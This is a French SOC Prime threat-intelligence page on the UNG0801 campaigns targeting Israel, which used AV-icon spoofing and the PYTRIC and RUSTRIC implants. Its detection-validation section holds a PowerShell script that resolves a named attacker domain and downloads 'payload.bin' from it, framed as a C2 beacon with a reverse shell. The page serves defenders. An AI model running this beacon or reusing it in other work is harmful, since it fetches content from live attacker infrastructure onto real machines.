SOC Prime Bias: Critique

30 Dec 2025 13:40 UTC

UNG0801 : Activité malveillante ciblée vers Israël induite par l’usurpation d’icône AV

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
UNG0801 : Activité malveillante ciblée vers Israël induite par l’usurpation d’icône AV
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le rapport décrit deux campagnes connectées qui utilisent des documents PDF et Word malveillants pour livrer des charges utiles qui imitent des icônes d’antivirus et ciblent des organisations israéliennes. Une piste déploie PYTRIC, un implant Python emballé avec PyInstaller, tandis que l’autre distribue RUSTRIC, un implant basé sur Rust lancé via un document Word avec macro activée. Les deux charges utiles collectent des détails sur l’hôte, exécutent des commandes système et sondent les logiciels de sécurité installés ; PYTRIC inclut en outre des fonctionnalités destructrices. La livraison est pilotée par des pièces jointes de spear-phishing et des liens hébergés sur le cloud (y compris Dropbox), avec Telegram utilisé pour le commandement et le contrôle.

Enquête

Les Laboratoires SEQRITE ont analysé les appâts de phishing initiaux, extrait les macros intégrées et reconstruit la chaîne de charges utiles déposées. PYTRIC a été confirmé comme un paquet PyInstaller avec des routines de découverte de fichier et d’effacement, et les analystes ont observé des identifiants de bot Telegram associés à Backup2040. RUSTRIC a été profilé comme un binaire Rust qui vérifie vingt-huit produits antivirus et déclenche une charge utile encodée en hexadécimal via WMI. L’analyse de l’infrastructure a relié la livraison à un lien Dropbox et un domaine se résolvant à une adresse IP précédemment liée à netvigil.org.

Atténuation

Formez les utilisateurs à traiter avec prudence les pièces jointes PDF et Word non sollicitées, en particulier les fichiers présentés comme des outils de sécurité ou des utilitaires liés à l’antivirus. Configurez la sécurité des courriels pour bloquer les documents porteurs de macros et signaler ou restreindre les URL pointant vers des hôtes de stockage cloud utilisés pour la livraison de charges utiles. Sur les points de terminaison, surveillez l’exécution de PyInstaller, la création de processus WMI inhabituelle et l’invocation suspecte d’utilitaires intégrés tels que whoami, hostname et nslookup. Bloquer les domaines et les IP malveillants identifiés peut également perturber le chemin d’infection.

Réponse

Si une activité est détectée, isolez le système affecté, préservez les données volatiles et collectez les documents malveillants pour un tri basé sur les hash. Arrêtez les processus lancés en WMI suspects et supprimez les charges utiles déposées des emplacements de staging courants tels que le dossier Téléchargements. Effectuez une validation judiciaire pour l’activité de suppression ou d’effacement de fichiers, réinitialisez les identifiants potentiellement exposés et surveillez les communications ultérieures de Telegram C2.

Flux d’attaque

Exécution de la simulation

Condition préalable : la vérification préalable de la télémétrie et de la base de référence doit avoir été réussie.

Raisonnement : cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Récit d’attaque et commandes :
    L’adversaire a préalablement enregistré le domaine stratioai.org et l’a configuré pour se résoudre en 159.198.68.25 (un VPS compromis). En utilisant une ligne unique PowerShell, ils initient un beacon C2 qui télécharge une petite charge utile puis maintient un shell inversé persistant. La connexion sortante est effectuée par HTTPS (port 443) pour se fondre dans le trafic normal, mais le pare-feu journalise l’IP de destination et la requête DNS, satisfaisant la règle sigma.

  • Script de test de régression :

    # -------------------------------------------------
    # Beacon C2 simulé pour validation de détection
    # -------------------------------------------------
    # 1. Résoudre le domaine malveillant (force la requête DNS)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Résolu $maliciousDomain en $($resolved -join ', ')"
    
    # 2. Établir une connexion HTTPS à l'IP malveillante (C2)
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "Requête C2 réussie, taille: $($response.ContentLength) octets"
    } catch {
        Write-Error "La requête C2 a échoué: $_"
    }
    
    # 3. OPTIONNEL : Garder le canal ouvert pendant 30 secondes
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • Commandes de nettoyage :

    # Supprimer tous les fichiers temporaires (aucun créé par ce script)
    # Vider le cache DNS pour éviter une réutilisation accidentelle
    ipconfig /flushdns
    Write-Host "Nettoyage terminé."